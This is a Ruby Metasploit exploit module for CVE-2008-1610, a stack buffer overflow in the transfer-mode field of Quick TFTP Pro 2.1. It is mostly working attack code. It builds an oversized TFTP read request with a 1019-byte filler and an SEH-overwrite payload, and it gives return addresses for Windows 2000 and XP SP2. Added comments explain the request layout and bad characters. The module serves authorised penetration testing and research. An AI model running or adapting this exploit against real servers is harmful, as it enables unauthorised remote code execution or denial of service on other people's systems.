##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
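class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Seh

  # Module metadata for CVE-2008-1610: a stack buffer overflow in the
  # transfer-mode field of a Quick TFTP Pro 2.1 read request, ported from
  # the original proof of concept credited in the description.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        # The product is Quick *TFTP* Pro (see the description, the CVE and the
        # module path); the earlier name read "Quick FTP Pro".
        'Name' => 'Quick TFTP Pro 2.1 Transfer-Mode Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the Quick TFTP Pro server
          product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting
          in a DoS. This is a port of a sploit by Mati "muts" Aharoni.
        },
        'Author' => 'Saint Patrick',
        'References' => [
          ['CVE', '2008-1610'],
          ['OSVDB', '43784'],
          ['BID', '28459'],
          ['URL', 'http://web.archive.org/web/20080330000001/http://secunia.com:80/advisories/29494/'],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Payload' => {
          'Space' => 460,
          # Bytes the request cannot carry; NUL terminates TFTP string fields,
          # the whitespace bytes are presumably rejected by the server's parser.
          'BadChars' => "\x00\x20\x0a\x0d",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        # 'Ret' is the address generate_seh_payload writes over the SEH handler.
        # Per the description, KB926436 changes oledlg.dll, so the XP target
        # only crashes the service (DoS) on patched hosts.
        'Targets' => [
          ['Windows Server 2000', { 'Ret' => 0x75022AC4 }], # ws2help.dll
          ['Windows XP SP2', { 'Ret' => 0x74D31458 }], # oledlg.dll
        ],
        'DefaultTarget' => 1,
        'DisclosureDate' => '2008-03-27',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(69)
      ]
    )
  end

  # Send one oversized TFTP read request and wait on the payload handler.
  #
  # Request layout, in the order the bytes are written: opcode 0x0002 (RRQ),
  # a 4-letter random filename, NUL, a 1019-byte 'A' filler, the SEH payload
  # returned by generate_seh_payload(target.ret), and a terminating NUL.
  # The fixed-length filler after the filename is what makes this request
  # stand out from a normal RRQ on the wire.
  #
  # @return [void]
  def exploit
    connect_udp

    print_status("Trying target #{target.name}...")

    sploit = "\x00\x02" + rand_text_english(4, payload_badchars) + "\x00"
    sploit << 'A' * 1019
    sploit << generate_seh_payload(target.ret)
    sploit << "\x00"

    begin
      udp_sock.put(sploit)
      print_status("Done.")

      handler
    ensure
      # Release the socket even when the send or the handler raises
      disconnect_udp
    end
  end
end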